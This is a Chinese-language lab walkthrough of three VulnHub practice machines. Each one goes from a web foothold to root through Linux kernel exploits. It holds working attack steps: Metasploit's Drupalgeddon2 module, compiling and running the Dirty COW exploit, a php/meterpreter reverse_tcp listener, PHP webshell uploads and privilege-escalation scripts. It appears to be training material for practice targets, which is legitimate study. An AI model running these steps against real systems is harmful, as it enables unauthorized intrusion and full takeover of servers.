一:Web到Linux-内核溢出Dcow
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1.信息收集:探测⽬标ip及开发端⼝
2.Web漏洞利⽤:
查找drupal相关漏洞
search drupal
# 进⾏漏洞利⽤
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168. .
set rport 1898
run
3.内核提权:
# 上传内核漏洞检测脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh
# 进⼊shell,并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
4.发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器
exit
upload /root/dcow.cpp /tmp/dcow.cpp
5. 编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls
# 由于本身的终端问题,所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
# 漏洞利⽤成功后使⽤root⽤户密码dirtyCowFun进⾏登录即可
su root
whoami
二:Web到Linux-内核溢出Pwnkit
复现环境:https://www.vulnhub.com/entry/darkhole-1,724/
1.信息收集:探测⽬标ip及开发端⼝
2.Web漏洞利⽤:
重置管理密码,注册新账号,使⽤注册⽤户登录,并重置密码,
使用Bp抓包进行修改管理员密码进入后台 ,上传一句话木马进入
3. 反弹MSF
将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录
4.启动msf
└─# msfdb run
# 监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666(端口自己设置)
run
5.内核提权
通过xftp8上传两个文件linux-exploit-suggester.sh linpeas.sh
进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh
运行两个文件
查找漏洞利⽤模块 使⽤提权漏洞利⽤模块 在获取的shell中查看当前⽤户权限
Web到Linux-内核溢出-DirtyPipe
复现环境:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
1.信息收集:
2.Web漏洞利⽤
⽬录扫描 dirb http://192.168. .
访问http://192.168. . /graffiti.php进⾏功能测试并抓包
3. 写⼊⼀句话⽊⻢发送恶意代码,并使⽤哥斯拉连接
4. 反弹MSF
5. 内核提权
上传提权内核漏洞检测辅助脚本
进⼊shell进⾏提权漏洞检测
shell
cd /tmp
chmod +x 1.sh
./1.sh